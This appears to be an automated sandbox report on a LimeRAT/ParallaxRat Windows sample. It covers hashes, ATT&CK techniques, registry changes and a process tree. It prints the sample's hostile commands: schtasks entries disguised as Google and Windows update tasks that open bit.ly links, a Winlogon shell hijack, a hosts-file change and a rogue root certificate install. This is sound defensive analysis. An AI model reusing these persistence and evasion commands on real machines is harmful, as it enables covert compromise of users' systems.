limerat | df6fa5b55c8196df0a53575cd26f5a7e53146899d41ab1a1a3acdb320f185d1f

Analysis

max time kernel
147s
max time network
126s
platform
windows7_x64
resource
win7-en-20211014
submitted
03-11-2021 08:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2e45c3146bebd87ccef96e054374ea11.exe
Size

645KB
MD5

2e45c3146bebd87ccef96e054374ea11
SHA1

f2be6622242c311beb54f984c2fd85b865c2431c
SHA256

df6fa5b55c8196df0a53575cd26f5a7e53146899d41ab1a1a3acdb320f185d1f
SHA512

4277153eaea844fdcd1ab7920d290f7a877a2a46e6d71b5b962f445395e7c0299e859409fb52e96920bc31ab6d7ed2be81e69021c0145585984dc57c76469b51

Score

10^/10

limerat parallax persistence rat

Malware Config

Signatures

Contains code to disable Windows Defender 2 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/files/0x0006000000012654-63.dat	disable_win_def
behavioral1/files/0x0006000000012654-64.dat	disable_win_def

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies WinLogon for persistence 2 TTPs 2 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\security\\wowreg32.exe\""	2e45c3146bebd87ccef96e054374ea11.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2955169046-2371869340-1800780948-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\security\\wowreg32.exe\""	wowreg32.exe

ParallaxRat
ParallaxRat is a multipurpose RAT written in MASM.
rat parallax

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	wowreg32.exe

Executes dropped EXE 1 IoCs

pid	Process
560	wowreg32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
972	560	WerFault.exe	35

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1972	schtasks.exe
1968	schtasks.exe
1964	schtasks.exe
968	schtasks.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	wowreg32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	wowreg32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	wowreg32.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
660	2e45c3146bebd87ccef96e054374ea11.exe
660	2e45c3146bebd87ccef96e054374ea11.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe
560	wowreg32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
972	WerFault.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	660	2e45c3146bebd87ccef96e054374ea11.exe
Token: SeBackupPrivilege	660	2e45c3146bebd87ccef96e054374ea11.exe
Token: SeSecurityPrivilege	660	2e45c3146bebd87ccef96e054374ea11.exe
Token: SeBackupPrivilege	660	2e45c3146bebd87ccef96e054374ea11.exe
Token: SeDebugPrivilege	560	wowreg32.exe
Token: SeDebugPrivilege	560	wowreg32.exe
Token: SeDebugPrivilege	972	WerFault.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
560	wowreg32.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 660 wrote to memory of 968	660	2e45c3146bebd87ccef96e054374ea11.exe	29
PID 660 wrote to memory of 968	660	2e45c3146bebd87ccef96e054374ea11.exe	29
PID 660 wrote to memory of 968	660	2e45c3146bebd87ccef96e054374ea11.exe	29
PID 660 wrote to memory of 972	660	2e45c3146bebd87ccef96e054374ea11.exe	30
PID 660 wrote to memory of 972	660	2e45c3146bebd87ccef96e054374ea11.exe	30
PID 660 wrote to memory of 972	660	2e45c3146bebd87ccef96e054374ea11.exe	30
PID 968 wrote to memory of 1968	968	cmd.exe	34
PID 968 wrote to memory of 1968	968	cmd.exe	34
PID 968 wrote to memory of 1968	968	cmd.exe	34
PID 972 wrote to memory of 1972	972	cmd.exe	33
PID 972 wrote to memory of 1972	972	cmd.exe	33
PID 972 wrote to memory of 1972	972	cmd.exe	33
PID 660 wrote to memory of 560	660	2e45c3146bebd87ccef96e054374ea11.exe	35
PID 660 wrote to memory of 560	660	2e45c3146bebd87ccef96e054374ea11.exe	35
PID 660 wrote to memory of 560	660	2e45c3146bebd87ccef96e054374ea11.exe	35
PID 560 wrote to memory of 1964	560	wowreg32.exe	36
PID 560 wrote to memory of 1964	560	wowreg32.exe	36
PID 560 wrote to memory of 1964	560	wowreg32.exe	36
PID 560 wrote to memory of 968	560	wowreg32.exe	37
PID 560 wrote to memory of 968	560	wowreg32.exe	37
PID 560 wrote to memory of 968	560	wowreg32.exe	37
PID 560 wrote to memory of 972	560	wowreg32.exe	40
PID 560 wrote to memory of 972	560	wowreg32.exe	40
PID 560 wrote to memory of 972	560	wowreg32.exe	40

C:\Users\Admin\AppData\Local\Temp\2e45c3146bebd87ccef96e054374ea11.exe
"C:\Users\Admin\AppData\Local\Temp\2e45c3146bebd87ccef96e054374ea11.exe"
1⤵
- Modifies WinLogon for persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:660
- C:\Windows\system32\cmd.exe
  cmd /C schtasks /create /f /st "05:40" /sc daily /mo "30" /tn "GoogleUpdateTaskMachineCore{WFPWAHVH}" /tr "'explorer'http://bit.ly/2T86z58"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:968
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /st "05:40" /sc daily /mo "30" /tn "GoogleUpdateTaskMachineCore{WFPWAHVH}" /tr "'explorer'http://bit.ly/2T86z58"
    3⤵
    - Creates scheduled task(s)
    PID:1968
- C:\Windows\system32\cmd.exe
  cmd /C schtasks /create /f /st "22:28" /sc monthly /m "mar" /tn "Windows Update" /tr "'explorer'http://bit.ly/2va2VQa"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:972
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /st "22:28" /sc monthly /m "mar" /tn "Windows Update" /tr "'explorer'http://bit.ly/2va2VQa"
    3⤵
    - Creates scheduled task(s)
    PID:1972
- C:\Users\Admin\AppData\Roaming\security\wowreg32.exe
  "C:\Users\Admin\AppData\Roaming\security\wowreg32.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:560
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /st "05:05" /sc daily /mo "2" /tn "" /tr "'explorer'C_Settings.URL1"
    3⤵
    - Creates scheduled task(s)
    PID:1964
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /st "05:05" /sc daily /mo "1" /tn "" /tr "'explorer'C_Settings.URL2"
    3⤵
    - Creates scheduled task(s)
    PID:968
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 560 -s 628
    3⤵
    - Program crash
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    PID:972

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Winlogon Helper DLL

T1004

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/560-98-0x000000001B431000-0x000000001B435000-memory.dmp

Filesize
16KB

Download
memory/560-111-0x000000001B410000-0x000000001B412000-memory.dmp

Filesize
8KB

Download
memory/560-99-0x000000001B41A000-0x000000001B41C000-memory.dmp

Filesize
8KB

Download
memory/560-65-0x0000000000D30000-0x0000000000D31000-memory.dmp

Filesize
4KB

Download
memory/560-119-0x000000001B415000-0x000000001B417000-memory.dmp

Filesize
8KB

Download
memory/560-120-0x000000001B41D000-0x000000001B420000-memory.dmp

Filesize
12KB

Download
memory/560-71-0x000000001B405000-0x000000001B406000-memory.dmp

Filesize
4KB

Download
memory/560-70-0x000000001B3E6000-0x000000001B405000-memory.dmp

Filesize
124KB

Download
memory/560-72-0x000000001B406000-0x000000001B407000-memory.dmp

Filesize
4KB

Download
memory/560-74-0x000000001B408000-0x000000001B409000-memory.dmp

Filesize
4KB

Download
memory/560-73-0x000000001B407000-0x000000001B408000-memory.dmp

Filesize
4KB

Download
memory/560-76-0x000000001B40A000-0x000000001B40B000-memory.dmp

Filesize
4KB

Download
memory/560-75-0x000000001B409000-0x000000001B40A000-memory.dmp

Filesize
4KB

Download
memory/560-78-0x000000001B40C000-0x000000001B40D000-memory.dmp

Filesize
4KB

Download
memory/560-100-0x000000001B435000-0x000000001B436000-memory.dmp

Filesize
4KB

Download
memory/560-79-0x000000001B40D000-0x000000001B40E000-memory.dmp

Filesize
4KB

Download
memory/560-81-0x000000001B40F000-0x000000001B410000-memory.dmp

Filesize
4KB

Download
memory/560-80-0x000000001B40E000-0x000000001B40F000-memory.dmp

Filesize
4KB

Download
memory/560-83-0x000000001B411000-0x000000001B412000-memory.dmp

Filesize
4KB

Download
memory/560-82-0x000000001B410000-0x000000001B411000-memory.dmp

Filesize
4KB

Download
memory/560-84-0x000000001B412000-0x000000001B413000-memory.dmp

Filesize
4KB

Download
memory/560-85-0x000000001B413000-0x000000001B414000-memory.dmp

Filesize
4KB

Download
memory/560-87-0x000000001B415000-0x000000001B417000-memory.dmp

Filesize
8KB

Download
memory/560-86-0x000000001B414000-0x000000001B415000-memory.dmp

Filesize
4KB

Download
memory/560-88-0x000000001B417000-0x000000001B419000-memory.dmp

Filesize
8KB

Download
memory/560-90-0x000000001B41B000-0x000000001B41D000-memory.dmp

Filesize
8KB

Download
memory/560-89-0x000000001B419000-0x000000001B41B000-memory.dmp

Filesize
8KB

Download
memory/560-92-0x000000001B41F000-0x000000001B421000-memory.dmp

Filesize
8KB

Download
memory/560-91-0x000000001B41D000-0x000000001B41F000-memory.dmp

Filesize
8KB

Download
memory/560-94-0x000000001B423000-0x000000001B425000-memory.dmp

Filesize
8KB

Download
memory/560-93-0x000000001B421000-0x000000001B423000-memory.dmp

Filesize
8KB

Download
memory/560-96-0x000000001B429000-0x000000001B42D000-memory.dmp

Filesize
16KB

Download
memory/560-95-0x000000001B425000-0x000000001B429000-memory.dmp

Filesize
16KB

Download
memory/560-67-0x000000001B3E0000-0x000000001B3E2000-memory.dmp

Filesize
8KB

Download
memory/560-97-0x000000001B42D000-0x000000001B431000-memory.dmp

Filesize
16KB

Download
memory/560-77-0x000000001B40B000-0x000000001B40C000-memory.dmp

Filesize
4KB

Download
memory/560-121-0x000000001B407000-0x000000001B40C000-memory.dmp

Filesize
20KB

Download
memory/560-122-0x000000001B436000-0x000000001B437000-memory.dmp

Filesize
4KB

Download
memory/560-103-0x000000001B416000-0x000000001B417000-memory.dmp

Filesize
4KB

Download
memory/560-102-0x000000001B415000-0x000000001B41C000-memory.dmp

Filesize
28KB

Download
memory/560-105-0x000000001B419000-0x000000001B41C000-memory.dmp

Filesize
12KB

Download
memory/560-104-0x000000001B41D000-0x000000001B420000-memory.dmp

Filesize
12KB

Download
memory/560-107-0x000000001B405000-0x000000001B406000-memory.dmp

Filesize
4KB

Download
memory/560-106-0x000000001B407000-0x000000001B40C000-memory.dmp

Filesize
20KB

Download
memory/560-108-0x000000001B40E000-0x000000001B411000-memory.dmp

Filesize
12KB

Download
memory/560-110-0x000000001B416000-0x000000001B417000-memory.dmp

Filesize
4KB

Download
memory/560-109-0x000000001B40E000-0x000000001B412000-memory.dmp

Filesize
16KB

Download
memory/560-112-0x000000001B410000-0x000000001B412000-memory.dmp

Filesize
8KB

Download
memory/560-101-0x000000001B41D000-0x000000001B420000-memory.dmp

Filesize
12KB

Download
memory/560-114-0x000000001B419000-0x000000001B41C000-memory.dmp

Filesize
12KB

Download
memory/560-113-0x000000001B41D000-0x000000001B41E000-memory.dmp

Filesize
4KB

Download
memory/560-116-0x000000001B436000-0x000000001B438000-memory.dmp

Filesize
8KB

Download
memory/560-115-0x000000001B407000-0x000000001B40B000-memory.dmp

Filesize
16KB

Download
memory/560-118-0x000000001B43A000-0x000000001B43C000-memory.dmp

Filesize
8KB

Download
memory/560-117-0x000000001B438000-0x000000001B43A000-memory.dmp

Filesize
8KB

Download
memory/560-131-0x000000001D8A9000-0x000000001D8B1000-memory.dmp

Filesize
32KB

Download
memory/560-130-0x000000001D8A0000-0x000000001D8A9000-memory.dmp

Filesize
36KB

Download
memory/560-129-0x000000001B454000-0x000000001B460000-memory.dmp

Filesize
48KB

Download
memory/560-128-0x000000001B450000-0x000000001B454000-memory.dmp

Filesize
16KB

Download
memory/560-127-0x000000001B44C000-0x000000001B450000-memory.dmp

Filesize
16KB

Download
memory/560-126-0x000000001B448000-0x000000001B44C000-memory.dmp

Filesize
16KB

Download
memory/560-125-0x000000001B444000-0x000000001B448000-memory.dmp

Filesize
16KB

Download
memory/560-124-0x000000001B440000-0x000000001B444000-memory.dmp

Filesize
16KB

Download
memory/560-123-0x000000001B43C000-0x000000001B440000-memory.dmp

Filesize
16KB

Download
memory/660-55-0x0000000000210000-0x0000000000211000-memory.dmp

Filesize
4KB

Download
memory/660-57-0x000000001AFF0000-0x000000001AFF2000-memory.dmp

Filesize
8KB

Download
memory/972-163-0x000007FEFBB71000-0x000007FEFBB73000-memory.dmp

Filesize
8KB

Download